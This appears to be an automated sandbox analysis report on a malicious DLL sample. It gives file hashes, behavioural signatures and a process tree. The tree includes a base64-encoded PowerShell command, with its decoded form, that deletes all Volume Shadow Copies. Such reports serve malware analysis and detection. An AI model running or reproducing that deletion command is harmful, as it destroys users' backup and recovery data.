Analysis
- max time kernel: 111s
- max time network: 146s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-05-2022 23:48
Static task: static1

Behavioral task: behavioral1
- Sample: d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
- Resource: win7-20220414-en

Behavioral task: behavioral2
- Sample: d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
- Resource: win10v2004-20220414-en
General
- Target: d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
- Size: 164KB
- MD5: 4ddc4c10f348e34445cae6ebac80bf87
- SHA1: 54fa2d553b774fa273e254ea8a9484f17a4b8747
- SHA256: d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e
- SHA512: d91730d1e1bcaa5e58b1a9cebee04d2634d80094ae953e3c329acb5476960bdb79dc0a3bc5b8da2836c3646a90ba91d5126b47b5e83f88dab7b05c7650700c58
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe

  | description | ioc | process |
  |---|---|---|
  | File opened (read-only) | \??\F: | rundll32.exe |
  | File opened (read-only) | \??\J: | rundll32.exe |
  | File opened (read-only) | \??\L: | rundll32.exe |
  | File opened (read-only) | \??\M: | rundll32.exe |
  | File opened (read-only) | \??\Q: | rundll32.exe |
  | File opened (read-only) | \??\U: | rundll32.exe |
  | File opened (read-only) | \??\Z: | rundll32.exe |
  | File opened (read-only) | \??\H: | rundll32.exe |
  | File opened (read-only) | \??\I: | rundll32.exe |
  | File opened (read-only) | \??\N: | rundll32.exe |
  | File opened (read-only) | \??\T: | rundll32.exe |
  | File opened (read-only) | \??\X: | rundll32.exe |
  | File opened (read-only) | \??\Y: | rundll32.exe |
  | File opened (read-only) | \??\E: | rundll32.exe |
  | File opened (read-only) | \??\S: | rundll32.exe |
  | File opened (read-only) | \??\V: | rundll32.exe |
  | File opened (read-only) | \??\W: | rundll32.exe |
  | File opened (read-only) | \??\A: | rundll32.exe |
  | File opened (read-only) | \??\B: | rundll32.exe |
  | File opened (read-only) | \??\G: | rundll32.exe |
  | File opened (read-only) | \??\K: | rundll32.exe |
  | File opened (read-only) | \??\O: | rundll32.exe |
  | File opened (read-only) | \??\P: | rundll32.exe |
  | File opened (read-only) | \??\R: | rundll32.exe |

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: rundll32.exe, powershell.exe

  | pid | process |
  |---|---|
  | 2684 | rundll32.exe |
  | 2684 | rundll32.exe |
  | 2396 | powershell.exe |
  | 2396 | powershell.exe |

- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe

  | description | pid | process |
  |---|---|---|
  | Token: SeDebugPrivilege | 2684 | rundll32.exe |
  | Token: SeDebugPrivilege | 2396 | powershell.exe |
  | Token: SeBackupPrivilege | 4184 | vssvc.exe |
  | Token: SeRestorePrivilege | 4184 | vssvc.exe |
  | Token: SeAuditPrivilege | 4184 | vssvc.exe |

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe

  | description | pid | process | target process |
  |---|---|---|---|
  | PID 4496 wrote to memory of 2684 | 4496 | rundll32.exe | rundll32.exe |
  | PID 4496 wrote to memory of 2684 | 4496 | rundll32.exe | rundll32.exe |
  | PID 4496 wrote to memory of 2684 | 4496 | rundll32.exe | rundll32.exe |
  | PID 2684 wrote to memory of 2396 | 2684 | rundll32.exe | powershell.exe |
  | PID 2684 wrote to memory of 2396 | 2684 | rundll32.exe | powershell.exe |
Processes
- C:\Windows\system32\rundll32.exe
  command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which is what triggers the vssvc.exe activity below)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken